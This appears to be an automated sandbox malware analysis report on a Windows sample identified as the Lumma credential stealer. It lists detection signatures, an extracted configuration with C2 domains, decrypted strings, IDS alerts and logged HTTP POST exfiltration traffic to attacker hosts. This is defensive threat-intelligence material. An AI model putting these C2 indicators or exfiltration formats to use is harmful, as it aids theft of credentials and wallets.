Windows Analysis Report
YKri2nEBWE.exe

Overview

General Information

Sample name:YKri2nEBWE.exe
renamed because original name is a hash value
Original sample name:1c4c5cca8b9c930895e0e425563cf07e.exe
Analysis ID:1580915
MD5:1c4c5cca8b9c930895e0e425563cf07e
SHA1:d0db3a5c54648e8480652d342dcb2526e4f9ce4d
SHA256:36dd0a1b361b0bb7d38e1bccc954188ac2cd7d030440bbf406da3a27fb5ba098
Tags:exe, user-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • YKri2nEBWE.exe (PID: 6460 cmdline: "C:\Users\user\Desktop\YKri2nEBWE.exe" MD5: 1C4C5CCA8B9C930895E0E425563CF07E)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["manyrestro.lat", "observerfry.lat", "tentabatte.lat", "wordyfindy.lat", "slipperyloo.lat", "bashfulacid.lat", "talkynicer.lat", "shapestickyr.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-26T13:09:25.225746+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP
2024-12-26T13:09:27.876648+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:29.989306+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:32.689522+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:37.545483+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:40.569369+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49717 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:43.592013+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49729 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:46.195558+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49736 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:50.190424+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.5 | 49747 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:28.651555+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:30.761854+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:28.651555+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:30.761854+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:23.453183+0100 | 2058480 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 57309 | 1.1.1.1 | 53 | UDP
2024-12-26T13:09:23.166540+0100 | 2058484 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 50814 | 1.1.1.1 | 53 | UDP
2024-12-26T13:09:22.732990+0100 | 2058492 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 63101 | 1.1.1.1 | 53 | UDP
2024-12-26T13:09:22.875255+0100 | 2058500 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 62155 | 1.1.1.1 | 53 | UDP
2024-12-26T13:09:22.593628+0100 | 2058502 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49392 | 1.1.1.1 | 53 | UDP
2024-12-26T13:09:23.026058+0100 | 2058510 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 55701 | 1.1.1.1 | 53 | UDP
2024-12-26T13:09:23.312825+0100 | 2058512 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 56756 | 1.1.1.1 | 53 | UDP
2024-12-26T13:09:22.355457+0100 | 2058514 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 62122 | 1.1.1.1 | 53 | UDP
2024-12-26T13:09:44.390705+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49729 | 172.67.157.254 | 443 | TCP
2024-12-26T13:09:26.082788+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP

                AV Detection

Source: YKri2nEBWE.exe | Avira: detected
Source: https://lev-tolstoi.com/piNXxr& | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/W | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/t | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apil | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apix | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apis | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/uo0 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apiB | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/0 | Avira URL Cloud: Label: malware
Source: https://lev-tolstoi.com/apimC | Avira URL Cloud: Label: malware
Source: YKri2nEBWE.exe.6460.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "observerfry.lat", "tentabatte.lat", "wordyfindy.lat", "slipperyloo.lat", "bashfulacid.lat", "talkynicer.lat", "shapestickyr.lat", "curverpluch.lat"], "Build id": "LOGS11--LiveTraffic"}
Source: YKri2nEBWE.exe | Virustotal: Detection: 56%
Source: YKri2nEBWE.exe | ReversingLabs: Detection: 63%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: YKri2nEBWE.exe | Joe Sandbox ML: detected
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.2085036026.00000000052C0000.00000004.00001000.00020000.00000000.sdmpString decryptor: LOGS11--LiveTraffic
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C557C0 CryptUnprotectData,0_2_00C557C0
                Source: YKri2nEBWE.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49736 version: TLS 1.2
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00C80340
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov edx, ebx0_2_00C48600
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then lea esi, dword ptr [eax+00000270h]0_2_00C48A50
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_00C4CC7A
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_00C80D20
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C6D34A
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov eax, ebx0_2_00C67440
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_00C67440
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_00C81720
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00C61A10
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C6E0DA
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C6C0E6
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00C6C09E
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_00C681CC

                Networking

                Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:56756 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:49392 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:63101 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:62122 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:55701 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:62155 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:50814 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:57309 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49729 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.157.254:443
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49729 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49736 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49747 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49717 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 53 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KXFK18MULF3J | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12805 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VKT7L0W22DT4VG3WF7N | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15089 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=GMDSDS57JOWEY | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20543 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6D1VSVWUV9B0Q | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1217 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=D4K1U7QC7LXR63 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 572733 | Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
                Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
                Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
                Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
                Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
                Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
                Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
                Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                Source: YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: YKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: YKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
